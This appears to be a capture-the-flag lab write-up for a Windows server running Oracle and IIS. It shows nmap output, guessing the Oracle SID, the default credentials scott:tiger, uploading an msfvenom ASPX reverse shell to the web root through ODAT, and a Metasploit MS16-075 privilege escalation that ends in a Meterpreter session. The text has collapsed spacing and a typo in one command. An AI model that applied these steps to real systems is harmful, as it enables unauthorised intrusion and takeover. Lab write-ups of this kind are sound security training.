# Nmap 7.70 scan initiated Sun Jul 21 16:43:41 2019 as: nmap -sV -sC -O -A -p 80,135,139,445,1521,5985,47001 -oN O-detailed (0.28s latency).PORTSTATESERVICEVERSION80/tcpopenhttpMicrosoftIIShttpd8.5|http-methods:|_Potentiallyriskymethods:TRACE|_http-server-header:Microsoft-IIS/8.5|_http-title:IISWindowsServer135/tcpopenmsrpcMicrosoftWindowsRPC139/tcpopennetbios-ssnMicrosoftWindowsnetbios-ssn445/tcpopenmicrosoft-dsMicrosoftWindowsServer2008R2-2012microsoft-ds1521/tcpopenoracle-tnsOracleTNSlistener11. (unauthorized)5985/tcpopenhttpMicrosoftHTTPAPIhttpd2.0 (SSDP/UPnP)|_http-server-header:Microsoft-HTTPAPI/2.0|_http-title:NotFound47001/tcpopenhttpMicrosoftHTTPAPIhttpd2.0 (SSDP/UPnP)|_http-server-header:Microsoft-HTTPAPI/2.0|_http-title:NotFoundWarning:OSScanresultsmaybeunreliablebecausewecouldnotfindatleast1openand1closedportAggressive OS guesses: Microsoft Windows Server 2012 (96%), Microsoft Windows Server 2012 R2 (94%), Microsoft Windows Server 2008 SP2 (93%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (93%), Microsoft Windows Server 2008 SP1 (93%), Microsoft Windows Vista SP1 (93%), Microsoft Windows 7 Professional SP1 (93%), Microsoft Windows 7 (92%), Microsoft Windows Server 2012 or Server 2012 R2 (92%), Microsoft Windows Server 2012 R2 Update 1 (92%)
NoexactOSmatchesforhost (test conditionsnon-ideal).NetworkDistance:2hopsServiceInfo:OSs:Windows,WindowsServer2008R2-2012; CPE:cpe:/o:microsoft:windowsHostscriptresults:|_clock-skew:mean:-6m45s,deviation:0s,median:-6m45s|smb-security-mode:|authentication_level:user|challenge_response:supported|_message_signing:supported|smb2-security-mode:|2.02:|_Messagesigningenabledbutnotrequired|smb2-time:|date:2019-07-2116:37:20|_start_date:2019-07-2116:20:43TRACEROUTE (using port443/tcp)HOPRTTADDRESS1231.02ms10.10.14.12265.03ms10.10.10.82OSandServicedetectionperformed.Pleasereportanyincorrectresultsathttps://nmap.org/submit/.# Nmap done at Sun Jul 21 16:44:11 2019 -- 1 IP address (1 host up) scanned in 30.90 seconds
So there are 3 web-servers, 3 SMB ports, and 1 Oracle Port. ran gobuster on all the web-servers but found nothing, dropped that vector. SMB ports, guest account was disabled and had no other credentials so dropped that too. Only port left was the Oracle Port. I found CVE-2012-1675, and it's exploit but I was not able to exploit it, either the server was not vulnerable or I had something mis-configured, so path beyond this was manual. However I found a Oracle Pentesting Kit on Github which was useful throughout the complete operation.
Find all the valid databases (SID) on this database.
Found XE and few other to be valid SID, however, I chose to focus on XE.
Check if any default credentials are working on this database on the server.
NOTE: I checked both, UPPERCASE and LOWERCASE variations as 11G stores case sensitive passwords by default. Found scott:tiger to be a set of valid credentials.
Next task was to check if this account is SYSDBA or SYSOPER on this database on the server. I used docker to run sqlplus and check this.
dockerrun-eURL="scott/tiget@// as sysdba"-tisflyr/sqlplusdockerrun-eURL="scott/tiget@// as sysoper"-tisflyr/sqlplus
It turns out that the user we had was a SYSDBA. One of the module of ODAT let's us put file on the server in a directory of our choosing, as we have web-servers running, we can be sure that there is a directory C:\Inetpub\wwwroot in the system, hence I chose to upload my ASPX MSFVENOM shell there and get a reverse shell.
msf5exploit(multi/handler) >searchlocal_exploit_suggesterMatchingModules================# Name Disclosure Date Rank Check Description----------------------------------------0post/multi/recon/local_exploit_suggesternormalNoMultiReconLocalExploitSuggestermsf5exploit(multi/handler) >usepost/multi/recon/local_exploit_suggestermsf5post(multi/recon/local_exploit_suggester) >setSESSION1SESSION =>1msf5post(multi/recon/local_exploit_suggester) >showoptionsModuleoptions (post/multi/recon/local_exploit_suggester):NameCurrentSettingRequiredDescription--------------------------------------SESSION1yesThesessiontorunthismoduleonSHOWDESCRIPTIONfalseyesDisplaysadetaileddescriptionfortheavailableexploitsmsf5post(multi/recon/local_exploit_suggester) >run[*] - Collecting local exploits for x64/windows...[*] - 11 exploit checks are being tried...[+] - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.[+] - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.[*] Post module execution completedmsf5post(multi/recon/local_exploit_suggester) >useexploit/windows/local/ms16_075_reflection_juicymsf5exploit(windows/local/ms16_075_reflection_juicy) >run[*] Started reverse TCP handler on[*] Launching notepad to host the exploit...[+] Process 832 launched.[*] Reflectively injecting the exploit DLL into 832...[*] Injecting exploit into 832...[*] Exploit injected. Injecting exploit configuration into 832...[*] Configuration injected. Executing exploit...[+] Exploit finished, wait for (hopefullyprivileged) payload execution to complete.[*] Sending stage (179779bytes) to[*] Meterpreter session 3 opened ( -> at 2019-07-21 23:08:45 +0530